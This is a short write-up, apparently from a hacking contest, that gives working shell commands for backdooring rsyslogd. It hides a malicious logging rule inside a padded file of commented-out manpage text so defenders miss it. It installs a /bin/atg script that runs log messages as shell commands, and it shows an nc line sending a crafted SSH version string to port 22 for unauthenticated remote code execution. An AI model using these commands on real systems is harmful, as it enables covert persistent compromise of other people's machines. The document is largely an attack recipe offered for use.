[Hacking-Contest] Backdooring rsyslogd

The following few lines add a backdoor to rsyslogd, which can be remotely exploited given that the backdoored host runs an SSH server:

man -a rsyslogd syslog|perl -pe'print "auth.* ^/bin/atg "if$.==177;print"#"' > /etc/rsyslog.d/README.conf
echo -e '#!/bin/sh\nsh -c "$1"'>/bin/atg
chmod 755 /bin/atg
/etc/init.d/rsyslog restart

Given the strict time limits of the Hacking Contest, the first line is optimized for size instead of readability. The basic function is to write the line "auth.* ^/bin/atg " to the file /etc/rsyslogd/README.conf. In order to confuse defenders, the sript creates a relatively large file with somewhat legitimately-looking comments, which are generated by using the manpages of rsyslogd and syslog, commenting out every single line of the manpages and adding the actual payload somewhere between (at line 177).

The next two lines create the script /bin/atg, which will just execute the first given command-line parameter (which is the log message from rsyslogd) with sh -c. Finally it is also required to restart rsyslogd in order to make the changes effective.

In order to exploit this vulnerability, it is required to get an attacker-controlled log message to rsyslogd. The ssh protocol requires both sides to exchange a version string in the first line. OpenSSH by default logs the version string of the client to syslog, which means that an unauthenticated remote attacker can create more or less arbitrary log messages. The following line shows how to remotely create a log message which exploits this backdoor by writing the output of the id command to /tmp/rsyslogd.owned.

echo "';id>/tmp/rsyslogd.owned;'"|nc target_ip 22

The semicolons in the beginning and end are required so that the shell executed from /bin/atg ignores the log message before/after the attacker-controlled content.